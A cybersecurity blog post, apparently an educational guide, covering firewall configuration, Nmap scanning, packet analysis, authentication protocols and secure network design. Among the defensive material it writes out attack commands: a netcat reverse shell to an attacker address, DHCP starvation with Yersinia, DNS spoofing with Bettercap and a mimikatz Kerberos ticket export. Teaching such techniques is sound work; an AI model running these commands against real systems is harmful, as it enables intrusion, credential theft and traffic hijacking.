Advertisement

HexaGuard: Mastering the Art of Digital Shadows

🔥 Network Administration & Security – Complete Guide 🔥

Hexa Guard March 13, 2025


This is a comprehensive guide to mastering Network Administration & Security, covering firewalls, network scanning, packet analysis, authentication, and secure network design. Let’s go step by step. 💪

📌 1. Configuring Routers & Firewalls

Firewalls are the first line of defense in network security. Let’s explore:

🔹 Linux Firewalls

1️⃣ iptables (Old but powerful)

  • Controls incoming/outgoing packets using chains & rules.
  • Command Examples: 
    bash

    sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT   # Allow SSH  
sudo iptables -A INPUT -p tcp --dport 80 -j DROP     # Block HTTP  
sudo iptables -L -v                                  # List rules
  • Use iptables-save and iptables-restore for rule persistence.

2️⃣ UFW (Uncomplicated Firewall - Easy for beginners)

  • A simple wrapper around iptables.
  • Command Examples: 
    bash

    sudo ufw enable                      # Enable firewall  
sudo ufw allow 22/tcp                 # Allow SSH  
sudo ufw deny 80/tcp                  # Block HTTP  
sudo ufw status verbose               # Check status

3️⃣ pfSense (Advanced GUI-based firewall)

  • A BSD-based firewall with a web UI.
  • Supports VPN, traffic shaping, IDS/IPS, etc.
  • Used in enterprise networks.

4️⃣ Windows Defender Firewall

  • Managed via GUI or PowerShell: 
    powershell

    New-NetFirewallRule -DisplayName "Block HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Block

📌 2. Network Scanning

Network scanning helps identify live hosts, open ports, services, and vulnerabilities.

🔹 1️⃣ Nmap (Network Mapper)

  • Host Discovery: 
    bash

    nmap -sn 192.168.1.0/24     # Find live hosts
  • Port Scanning: 
    bash

    nmap -p 22,80,443 192.168.1.1  # Scan specific ports  
nmap -p- 192.168.1.1            # Scan all 65,535 ports
  • Service & OS Detection: 
    bash

    nmap -sV -O 192.168.1.1
  • Vulnerability Scanning (Nmap Scripts): 
    bash

    nmap --script=vuln 192.168.1.1

🔹 2️⃣ Netcat (nc)

  • Check if a port is open: 
    bash

    nc -zv 192.168.1.1 80
  • Create a Reverse Shell (Attacker Machine): 
    bash

    nc -lvnp 4444
  • Victim connects back: 
    bash

    nc 192.168.1.10 4444 -e /bin/bash

🔹 3️⃣ Wireshark & tcpdump

  • Wireshark: GUI-based packet analyzer for sniffing traffic.
  • tcpdump: CLI-based packet sniffer. Example: 
    bash

    sudo tcpdump -i eth0 port 80

📌 3. Packet Analysis & Sniffing

Packet sniffing allows attackers/analysts to inspect network traffic.

🔹 Wireshark

  • Use filters like: 
    ini

    http.request.method == "POST"
ip.src == 192.168.1.1
  • Capture credentials, cookies, etc. if traffic is unencrypted.

🔹 tcpdump

  • Capture all HTTP traffic: 
    bash

    sudo tcpdump -i eth0 port 80 -w capture.pcap
  • Open capture.pcap in Wireshark for analysis.

📌 4. DHCP & DNS Poisoning

Attackers can manipulate DHCP and DNS to redirect victims.

🔹 DHCP Starvation Attack

  • Attackers flood a DHCP server with fake requests using Yersinia: 
    bash

    yersinia dhcp -attack 1

🔹 DNS Spoofing with Bettercap

  • Redirect victims to a fake website: 
    bash

    bettercap -iface eth0  
net.sniff on  
set dns.spoof.domains example.com  
set dns.spoof.address 192.168.1.100  
dns.spoof on

📌 5. Network Authentication

Authentication secures access to network resources.

🔹 LDAP (Lightweight Directory Access Protocol)

  • Used for centralized authentication.
  • Command to query an LDAP server: 
    bash

    ldapsearch -x -b "dc=example,dc=com"

🔹 Kerberos

  • Used in Windows Active Directory for secure authentication.
  • Attack: Pass-the-Ticket 
    bash

    mimikatz "kerberos::list /export"

🔹 RADIUS & TACACS+

  • RADIUS: Used for VPN, WiFi authentication.
  • TACACS+: Used in Cisco networks for device authentication.

📌 6. Secure Network Design

🔹 DMZ (Demilitarized Zone)

  • A subnet that hosts public-facing services (Web, Mail, DNS).
  • Protects the internal network from direct exposure.

🔹 VLAN (Virtual LAN)

  • Separates devices into isolated groups using 802.1Q.
  • Commands to configure VLAN (Cisco Switch): 
    bash

    enable  
configure terminal  
vlan 10  
name HR_Network  
exit

🔹 VPN (Virtual Private Network)

  • Encrypts traffic between remote users and the network.
  • Example: OpenVPN setup on Linux: 
    bash

    sudo apt install openvpn  
sudo openvpn --config myvpn.conf

🔹 Zero Trust Security

  • Never trust, always verify:
    • Multi-factor authentication (MFA).
    • Role-Based Access Control (RBAC).
    • Continuous monitoring with SIEM tools like Splunk.

🔥 Conclusion

✅ Now you have a strong foundation in Network Administration & Security. 🛡️

Next Steps:

  • Master Wireshark, Metasploit, Burp Suite for advanced network exploitation.
  • Set up a home lab with pfSense, OpenVPN, and VLANs.
  • Practice attacks & defenses using tools like Kali Linux & Parrot OS.
Hexa Guard

Posted by Hexa Guard

Hexa Guard is your go-to platform for mastering cybersecurity and ethical hacking. We specialize in providing educational resources, hands-on training, and cutting-edge security solutions to combat cyber threats. Our mission is to create a safer digital world by empowering individuals and organizations with practical skills and knowledge in ethical hacking, penetration testing, and red teaming. Join us to secure the future ethically—one step at a time! ����

Post a Comment

0 Comments